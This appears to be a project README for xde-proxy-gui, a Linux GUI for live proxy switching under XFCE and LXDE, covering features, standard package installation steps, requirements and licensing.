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title 🚀 xde-proxy-gui - Manage Your Proxy Settings Easily
description 🛠 Manage proxies effortlessly with XDE-Proxy-GUI, a lightweight tool offering GNOME-compatible live switching for XFCE and LXDE environments.

🚀 xde-proxy-gui - Manage Your Proxy Settings Easily

Download xde-proxy-gui

📦 Overview

xde-proxy-gui is a user-friendly application that allows you to manage your proxy settings effortlessly. With live switching for different environments, this tool supports GNOME and works well with XFCE and LXDE desktop environments. Whether you're using Fedora, Mageia, or another Linux distribution, this application helps you keep your internet connections secure and efficient.

🎯 Features

  • Live Switching: Change your proxy settings in real time without needing to restart your applications.
  • User-Friendly Interface: The easy-to-navigate GUI allows anyone to set up and manage proxies.
  • Supports Multiple Desktop Environments: Works seamlessly with GNOME, XFCE, LXDE and more.
  • System-Wide Proxy Settings: Configure proxy settings that apply across your entire system for consistent connectivity.
  • Compatible with Popular Distros: Works on Fedora, Mageia, and supports other distributions.

🚀 Getting Started

To get started with xde-proxy-gui, follow these simple steps:

Step 1: Visit the Releases Page

To download xde-proxy-gui, visit the Releases page.

Step 2: Choose the Latest Release

Look for the latest version of xde-proxy-gui on the Releases page. The newest version will have the highest version number.

Step 3: Download the Application

Click on the appropriate download link based on your system. Usually, the downloads will be bundled in formats such as .deb, .rpm, or an archive file like .tar.gz.

Step 4: Install the Application

  • For Debian-based systems (like Ubuntu): Use the command sudo dpkg -i your_downloaded_file.deb in your terminal.
  • For RPM-based systems (like Fedora): Use the command sudo rpm -i your_downloaded_file.rpm.
  • If you downloaded a tarball, extract it and follow any installation instructions provided in the README or INSTALL file within the extracted folder.

Step 5: Run xde-proxy-gui

Once the installation is complete, you can launch the application from your applications menu or by using the command line, depending on your setup.

📥 Download & Install

To get your copy of xde-proxy-gui, make sure to visit this page to download. Remember to choose the latest release for the best features and performance.

🛠️ System Requirements

To use xde-proxy-gui effectively, your system should meet the following requirements:

  • Operating System: A compatible Linux distribution (Fedora, Mageia, Ubuntu, etc.).
  • Desktop Environment: GNOME, XFCE, LXDE, or similar.
  • Memory: At least 1 GB of RAM (2 GB recommended).
  • Storage: About 100 MB of free space for installation.

🤝 Contributing

If you want to help improve xde-proxy-gui, contributions are welcome! Whether you have ideas for features or wish to report bugs, feel free to reach out. Please check the repository for contribution guidelines.

📞 Support

If you encounter issues or have questions, you can reach out through the GitHub Issues page. Provide clear details about your problem to get the best help.

📝 License

This project is licensed under the MIT License. You can view the complete license details in the LICENSE file found in the repository.

Feel free to explore the features of xde-proxy-gui and manage your internet connections effectively. Enjoy a hassle-free experience!